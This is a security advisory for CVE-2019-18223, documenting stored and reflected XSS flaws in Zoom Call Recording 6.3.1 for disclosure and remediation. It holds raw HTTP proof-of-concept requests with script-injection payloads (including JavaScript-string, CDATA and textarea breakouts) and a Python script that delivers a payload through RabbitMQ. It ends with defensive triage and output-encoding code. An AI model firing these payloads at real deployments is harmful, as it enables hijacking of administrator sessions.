CVE-2019-18223-XSS-ZoomCallRecording
Zoom Call Recording 6.3.1 from ZOOM International is affected by multiple stored and reflected cross-site scripting (XSS) vulnerabilities. The injection points are:
- the phoneNumber field in the (1) User Edit or (2) User Add form
- (3) the name field in the Role Add form
- (4) the name or number field in the Edit Group form
- (5) the tagKey or tagValue field in the Recording Rules Configuration
- (6) the txt_69735:/VemailAddress/value or txt_75767:/VemailFrom/value field in callrec/config
- (7) the selectedMenuId parameter of callrec/config.jsp, reflected into a JavaScript string literal
- (8) the xmlPath parameter of callrec/config, reflected into a CDATA section of the XML error response
- (9) recorder log lines rendered in the textarea of callrec/logs_view.jsp, which can be escaped via messages sent to the RabbitMQ component
Evidence
XSS(1) - Stored XSS in “/callrec/userEditAction.do” page
Request:
POST /callrec/userEditAction.do HTTP/1.1
Host: xxx.xxxxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxxxx.net/callrec/user_edit.jsp?userId=5&roleId=3
Content-Type: application/x-www-form-urlencoded
Content-Length: 329
Cookie: JSESSIONID=0724AC780C8C2535253EFD6ADBB16E55
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=10a6ccd1d842ac1ff64bc645fd053ea8&login2=XXXXXX&firstName=xxx+-+xxxxxx&lastName=xxxxx&email=xxx-xxxxxxx.xxx%40xxx.ro&phoneNumber=<script>alert('XSS')</script>&ldapUser=on&roleId=3&viewRoleId=&loginOriginal=XXXXXX&roleIdOriginal=3&ldapUserOriginal=LDAP&phoneNumberOriginal=&userId=5&ldapOriginal=true
Response:
HTTP/1.1 200 OK
Date: Wed, 09 Oct 2019 08:09:16 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 9959
Connection: close
***TRUNCATED***
<img src="images/icon-admin.png" width="16" height="16" alt=""><strong>XXXXXX</strong>
</a>
</td>
<td class="left soft_wrap">
Marin
</td>
<td class="left soft_wrap">
XXX - XXXXXXXX
</td>
<td class="number wrap">
<script>alert('XSS');</script>
</td>
<td style="text-align:center;">
<img src="images/icon-check.png" alt=""/>
***TRUNCATED***
XSS(2) - Stored XSS in “/callrec/userAddAction.do” page
Request:
POST /callrec/userAddAction.do HTTP/1.1
Host: xxx.xxxxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxxxx.net/callrec/user_add.jsp?viewRoleId=8
Content-Type: application/x-www-form-urlencoded
Content-Length: 334
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&roleId=8&viewRoleId=8&dispatch=addUser&groupLdapUsers=&login2=TTTTTTTTTTTTTT&password2=Qwerty1234&passwordVerify=Qwerty1234&firstName=qqqqqqqqqqq&lastName=bbbbbbbbbb&email=&phoneNumber=<script>alert("XSSNumber")</script>&value%28filter_1%29=-1&value%28conj_1%29=END
Response:
HTTP/1.1 200 OK
Date: Mon, 21 Oct 2019 08:45:17 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 10957
Connection: close
***TRUNCATED***
<img src="images/icon-admin.png" width="16" height="16" alt=""><strong>XXXXXX</strong>
</a>
</td>
<td class="left soft_wrap">
Marin
</td>
<td class="left soft_wrap">
XXX - XXXXXXXXX
</td>
<td class="number wrap">
<script>alert('XSS');</script>
</td>
<td style="text-align:center;">
<img src="images/icon-check.png" alt=""/>
***TRUNCATED***
XSS(3) - Stored XSS in “/callrec/roleAddAction.do” page
Request:
POST /callrec/roleAddAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/roleAddAction.do
Content-Type: application/x-www-form-urlencoded
Content-Length: 385
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&userId=5&dispatch=add&viewRoleId=3&name=<script>alert("XSSName")</script>&roleParentId=3&number=bbbbbbbbbbbbb&actionId=9&actionId=11&actionId=8&actionId=7&actionId=10&actionId=4&actionId=6&actionId=1&actionId=16&viewId=9%7C11%7C8%7C7%7C10%7C4%7C6%7C1%7C16%7C&description=&value%28filter_1%29=-1&value%28conj_1%29=END
XSS(4) - Stored XSS in “/callrec/roleEditAction.do” page
Request:
POST /callrec/roleEditAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/group_edit.jsp?viewRoleId=8
Content-Type: application/x-www-form-urlencoded
Content-Length: 451
Cookie: JSESSIONID=DD8E62B3FC844E4EFAA01439E6194493; m=2258:Y2FsbHJlYzpjYWxscmVj
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=7e772bb6a1e21d529fe4fa86010b5b62&userId=5&originalName=%3Cscript%3Ealert%28%22XSSName%22%29%3C%2Fscript%3E&roleId=8&name=<script>alert("XSSName")</script>&parentId=3&number=<script>alert("XSSNumber")</script>&actionId=9&actionId=11&actionId=8&actionId=7&actionId=10&actionId=4&actionId=6&actionId=1&actionId=16&viewId=9%7C11%7C8%7C7%7C10%7C4%7C6%7C1%7C16%7C&description=&value%28filter_1%29=-1&value%28conj_1%29=END
XSS(5) - Stored XSS in “/callrec/recRulesEditAction.do” page
Request:
POST /callrec/recRulesEditAction.do HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/recording_rules_edit.jsp?viewRoleId=1&ruleId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 398
Cookie: scroolY=0; JSESSIONID=BDFA58A8B635ED02BFDEE14CCFCD6104; m=
Connection: close
Upgrade-Insecure-Requests: 1
org.apache.struts.taglib.html.TOKEN=6188a4d2a8a71e769b9f3137585246d0&ruleId=1&roleId=1&policy=RECORD&typeRule=PHONE&mask=7561&probability=100&dayOfWeek=1&dayOfWeek=2&dayOfWeek=3&dayOfWeek=4&dayOfWeek=5&dayOfWeek=6&dayOfWeek=7&timeFrom=00%3A00&timeTo=24%3A00&active=on&screenRECProbability=100&addTag=on&tagKey="><script>alert('XSSTagKey')</script><&tagValue="><script>alert('XSSTagValue')</script><
XSS(6) - Stored XSS in “/callrec/config” page
Request:
POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/config.jsp?selectedModule=tools&selectedMenuId=menu_tools&selectedMenuOption=config/specified/tools/cz_zoom_callrec_tools_disk_space/view.jsp&specifiedConfiguration=disk_space
Content-type: application/x-www-form-urlencoded
Content-Length: 202
Cookie: scroolY=0; JSESSIONID=2C0E0A265B23D61CFC97E49068370C2F; m=
Connection: close
action=save&chb_69733:/VenabledEmail/value=false&chb_69734:/VenabledSNMP/value=false&txt_69735:/VemailAddress/value=asdsaddasdsadd"><script>alert('XSS')</script><&txt_69736:/VdaysLeftWhenNotify/value=20
Request:
POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.xxxxx.net/callrec/config.jsp?selectedModule=core&selectedMenuId=menu_core&selectedMenuOption=config/specified/core/cz_zoom_callrec_core_callstorage/view.jsp&specifiedConfiguration=smtp
Content-type: application/x-www-form-urlencoded
Content-Length: 157
Cookie: scroolY=0; JSESSIONID=712211C38CA7012B06C10BB1933D5B67; m=
Connection: close
action=save&txt_75766:/VsmtpAddress/value=127.0.0.1&txt_75767:/VemailFrom/value=callrec%40xxxxx.xxxxxxx.xxxxxx"><script>alert("SMTPConf")</script><
XSS(7) - Reflected XSS in “/callrec/config.jsp” page via injection into a JavaScript string literal (selectedMenuId)
Request:
GET /callrec/config.jsp?selectedModule=drivers&selectedMenuId='-alert('selectedMenuId')-'&selectedMenuOption=config/specified/drivers/cz_zoom_callrec_driver_genesys/view.jsp&specifiedConfiguration=genesysDriver HTTP/1.1
Host: xxx.xxxxxxx.net
Cookie: JSESSIONID=4D***TRUNCATED***39
Response:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:13:10 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 24468
***TRUNCATED***
/** Show the menu for the selected module. **/
function showSelectedModuleMenu() {
var menuId = ''-alert('selectedMenuId')-'';
setMenuContent(menuId);
document.getElementById("drivers").className = "selected";
}
</script>
***TRUNCATED***
XSS(8) - Reflected XSS in “/callrec/config” page via CDATA breakout in the XML error response (xmlPath)
Request:
POST /callrec/config HTTP/1.1
Host: xxx.xxxxx.net
Content-type: application/x-www-form-urlencoded
Content-Length: 137
Cookie: JSESSIONID=4D***TRUNCATED***39
action=removeEntry&xmlPath=/Eserver/aaa/]]><script+xmlns="http://www.w3.org/1999/xhtml"><![CDATA[+alert('xmlPath');+]]></script><![CDATA[
Response:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:23:41 GMT
Server: Apache
Content-Type: text/xml;charset=utf-8
Content-Length: 1702
Vary: Accept-Encoding
<?xml version="1.0"?>
<root>
<action>forward</action>
<resultType>error</resultType>
<message><![CDATA[<h1 style="font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px">AJAX Config Servlet Error</h1><HR size="1" noshade="noshade"><p><b>Message: </b><u>Removing object operation failed.</u></p><p><b>Exception: </b><pre>java.lang.IllegalAccessException: XmlPath is invalid (/Eserver/aaa/]]><script xmlns="http://www.w3.org/1999/xhtml"><![CDATA[ alert('xmlPath'); ]]></script><![CDATA[). Error is at "aaa" element. Cause: Equal group not found. Specification is not number and equal group with this name does not exist.
***TRUNCATED***
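The evidence for findings (1) to (8) rests on one observation: the submitted value comes back byte-for-byte in a context where the browser (or an XML consumer) interprets it. The following check is an added example for this advisory, not code from ZOOM International or from the original report. It runs offline over trimmed copies of three response fragments shown above (the phoneNumber table cell, the showSelectedModuleMenu() script, the AJAX Config Servlet error document) plus one constructed fragment showing what the table cell would look like if phoneNumber were entity-encoded. It classifies each reflection as raw, HTML-encoded, JS-encoded or absent, and for raw reflections guesses the context with a deliberately simple same-line heuristic (an assumption, not a parser).

```python
import html

# Trimmed copies of the response fragments shown in the evidence above, embedded so the
# check runs offline. Only the markup immediately around the reflected value is kept.
TD_FRAGMENT = '<td class="number wrap">\n<script>alert(\'XSS\');</script>\n</td>'   # XSS(1)
JS_FRAGMENT = "var menuId = ''-alert('selectedMenuId')-'';"                        # XSS(7)
XML_FRAGMENT = ('<message><![CDATA[XmlPath is invalid (/Eserver/aaa/]]><script xmlns='
                '"http://www.w3.org/1999/xhtml"><![CDATA[ alert(\'xmlPath\'); ]]></script>'
                '<![CDATA[). Error is at "aaa" element.]]></message>')              # XSS(8)
# Constructed: how the XSS(1) cell would look if phoneNumber were entity-encoded.
FIXED_TD_FRAGMENT = ('<td class="number wrap">\n&lt;script&gt;alert(&#x27;XSS&#x27;);'
                     '&lt;/script&gt;\n</td>')

FINDINGS = {
    "XSS(1) phoneNumber": (TD_FRAGMENT, "<script>alert('XSS');</script>"),
    "XSS(7) selectedMenuId": (JS_FRAGMENT, "'-alert('selectedMenuId')-'"),
    "XSS(8) xmlPath": (XML_FRAGMENT, '/Eserver/aaa/]]><script xmlns="http://www.w3.org/1999/xhtml">'
                                     "<![CDATA[ alert('xmlPath'); ]]></script><![CDATA["),
    "XSS(1) fixed (constructed)": (FIXED_TD_FRAGMENT, "<script>alert('XSS');</script>"),
}


def html_encoded_forms(payload):
    """Entity encodings a correct HTML-text encoder may emit for the payload."""
    hexq = html.escape(payload, quote=True)
    return {hexq, hexq.replace("&#x27;", "&#39;"), html.escape(payload, quote=False)}


def js_encoded_forms(payload):
    """Escapings a correct JS-string-literal encoder may emit for the payload."""
    backslashed = payload.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    unicode_escaped = "".join(c if c.isalnum() or c == " " else "\\u%04x" % ord(c) for c in payload)
    return {backslashed, unicode_escaped}


def classify_reflection(body, payload):
    """Return 'raw' (verbatim: confirmed injection), 'html-encoded', 'js-encoded' or 'absent'."""
    if payload in body:
        return "raw"
    if any(form in body for form in html_encoded_forms(payload)):
        return "html-encoded"
    if any(form in body for form in js_encoded_forms(payload)):
        return "js-encoded"
    return "absent"


def context_of(body, payload):
    """For a raw reflection, guess which of the three contexts seen in this advisory holds it.
    Heuristic (assumption): only the text on the same line before the payload is inspected."""
    idx = body.find(payload)
    if idx < 0:
        return None
    line_before = body[:idx].rsplit("\n", 1)[-1]
    if line_before.rfind("<![CDATA[") > line_before.rfind("]]>"):
        return "xml-cdata"            # inside an unterminated CDATA section
    if line_before.count("'") % 2 == 1 or line_before.count('"') % 2 == 1:
        return "js-string"            # inside an open quoted literal
    return "html-text"


def triage(findings=FINDINGS):
    """Classify every finding: (reflection kind, context)."""
    return {name: (classify_reflection(body, payload), context_of(body, payload))
            for name, (body, payload) in findings.items()}


if __name__ == "__main__":
    for name, (kind, ctx) in triage().items():
        print("%-28s %-13s %s" % (name, kind, ctx or "-"))
```

The same function pair works on live responses captured during a retest: a finding is closed when the classification for its payload changes from raw to html-encoded or js-encoded, not when the payload merely disappears (absent can mean truncation or a different error page rather than a fix).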
XSS(9) - Stored XSS in “/callrec/logs_view.jsp” page via RabbitMQ messages
The log viewer (logs_view.jsp) renders recorder log lines inside a textarea without HTML-encoding them. The recorder logs the payload of any AMQP message it cannot parse as a recording request, so an attacker with credentials to publish to the RabbitMQ queue the recorder consumes can close the textarea and inject arbitrary HTML/JS that executes when an administrator views the logs.
Python script for sending the XSS payload via AMQP:
#!/usr/bin/env python3
# Publishes the XSS payload as the body of an AMQP message. The recorder cannot parse it
# as a recording request, logs it verbatim, and logs_view.jsp renders it inside <textarea>.
# Usage: ./amqp_xss.py <username> <password> <target_ip> <queue_name>
import logging
import os
import sys
import pika  # pip install pika

logging.basicConfig()
if len(sys.argv) != 5:
    sys.exit("usage: %s <username> <password> <target_ip> <queue_name>" % sys.argv[0])
username, password, target_ip, queueName = sys.argv[1:5]
# Broker URL; the "Test" environment variable overrides it when set. %2f is the default vhost "/".
url = os.environ.get("Test", "amqp://%s:%s@%s/%%2f" % (username, password, target_ip))
params = pika.URLParameters(url)
params.socket_timeout = 5
# Closes the log viewer's <textarea> and injects a script element.
xss = "</textarea><script>alert('index_frame.jsp - Log Textarea')</script>"
connection = pika.BlockingConnection(params)
channel = connection.channel()
# Default exchange: routing_key is the name of the queue the recorder consumes from.
channel.basic_publish(exchange="", routing_key=queueName, body=xss)
print("[x] " + xss + " sent to consumer")
connection.close()
Request:
POST /callrec/logs_view.jsp HTTP/1.1
Host: xxx.xxxxx.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 19
Cookie: JSESSIONID=69***TRUNCATED***61
selLogIdx=28&page=0
Response:
HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 09:33:47 GMT
Server: Apache
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Content-Length: 37074
***TRUNCATED***
<textarea id="copytext">
fa329ff3700] ucl.threads.BoostThread - Thread process threw error: Opening TCP socket to [amqp://<IP>:5672]: a socket error occurred
Oct 24 10:11:31 ERROR [0x7fa3297f2700] ucl.threads.BoostThread - Thread process threw
***TRUNCATED***
Oct 24 15:17:44 WARN [0x7fa3137fe700] ucl.rec.RecorderRequestsHandler - Failed to get recording message for received amqp message: AmqpMessage{priority:0,delivery_mode:1,payload:</textarea><script>alert('index_frame.jsp - Log Textarea')</script>}
</textarea>
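The remediation for all nine findings is output encoding for the context each value lands in: HTML text and textarea content for (1) to (6) and (9), a JavaScript string literal for (7), and a CDATA section for (8). The following is an added example, not vendor code or code from the original report; it shows the three encoders with the page's own payloads as constructed input, each hardened renderer beside the shape of the vulnerable output above, and the naive CDATA wrapping that the error servlet response above exhibits (the value's own ]]> terminates the section) beside the split-CDATA form. Function names are the example's own.

```python
import html
import json
import xml.etree.ElementTree as ET

# Payloads taken from the evidence above, used here as constructed input.
TEXTAREA_PAYLOAD = "</textarea><script>alert('index_frame.jsp - Log Textarea')</script>"
JS_PAYLOAD = "'-alert('selectedMenuId')-'"
XMLPATH_PAYLOAD = ('/Eserver/aaa/]]><script xmlns="http://www.w3.org/1999/xhtml">'
                   "<![CDATA[ alert('xmlPath'); ]]></script><![CDATA[")


def html_text_encode(s):
    """HTML text, attribute and <textarea> content: entity-encode & < > " and '.
    A <textarea> decodes entities but never parses tags, so &lt;/textarea&gt; is
    displayed as text and cannot close the element."""
    return html.escape(s, quote=True)


def js_string_encode(s):
    """Value inside a JavaScript string literal: every character that is not ASCII
    alphanumeric becomes \\uXXXX (UTF-16 code units), so quotes, backslashes, < >
    and line terminators can end neither the literal nor the enclosing <script>."""
    out = []
    for ch in s:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
            continue
        units = ch.encode("utf-16-be")
        for i in range(0, len(units), 2):
            out.append("\\u%04x" % int.from_bytes(units[i:i + 2], "big"))
    return "".join(out)


def decode_js_string(encoded):
    """Reverse of js_string_encode, using the JSON parser's \\uXXXX handling."""
    return json.loads('"' + encoded + '"')


def cdata_naive(s):
    """What the error servlet response above does: a ]]> inside the value ends the section."""
    return "<![CDATA[" + s + "]]>"


def cdata_wrap(s):
    """CDATA cannot be escaped, only split: ]]> in the value becomes ]]]]><![CDATA[>, so the
    parser sees ']]' at the end of one section and '>' at the start of the next."""
    return "<![CDATA[" + s.replace("]]>", "]]]]><![CDATA[>") + "]]>"


def render_log_textarea(lines):
    """Hardened form of the logs_view.jsp textarea: log lines are data, never markup."""
    body = "\n".join(html_text_encode(line) for line in lines)
    return '<textarea id="copytext">\n' + body + "\n</textarea>"


def render_menu_script(menu_id):
    """Hardened form of showSelectedModuleMenu(): the id is always a string, never code."""
    return "var menuId = '" + js_string_encode(menu_id) + "';"


def render_xml_error(message, wrap=cdata_wrap):
    """Error document in the shape of the config servlet's text/xml response."""
    return "<root><resultType>error</resultType><message>" + wrap(message) + "</message></root>"


def xml_has_script_element(doc):
    """True if parsing the document yields a script element, i.e. the CDATA was broken out of."""
    return any(el.tag.endswith("script") for el in ET.fromstring(doc).iter())


def parsed_message_text(doc):
    """Text of <message> after parsing; with cdata_wrap it equals the original value."""
    return ET.fromstring(doc).find("message").text


if __name__ == "__main__":
    print(render_log_textarea([TEXTAREA_PAYLOAD]))
    print(render_menu_script(JS_PAYLOAD))
    msg = "XmlPath is invalid (" + XMLPATH_PAYLOAD + ")"
    print("naive CDATA yields script element:", xml_has_script_element(render_xml_error(msg, cdata_naive)))
    print("split CDATA yields script element:", xml_has_script_element(render_xml_error(msg)))
```

In the JSP layer the equivalent of html_text_encode is the JSTL `<c:out>` tag (or `fn:escapeXml`), which escapes XML-significant characters by default; values that must end up inside a script block still need the JavaScript-string encoder rather than HTML escaping, because entity references are not decoded inside `<script>`.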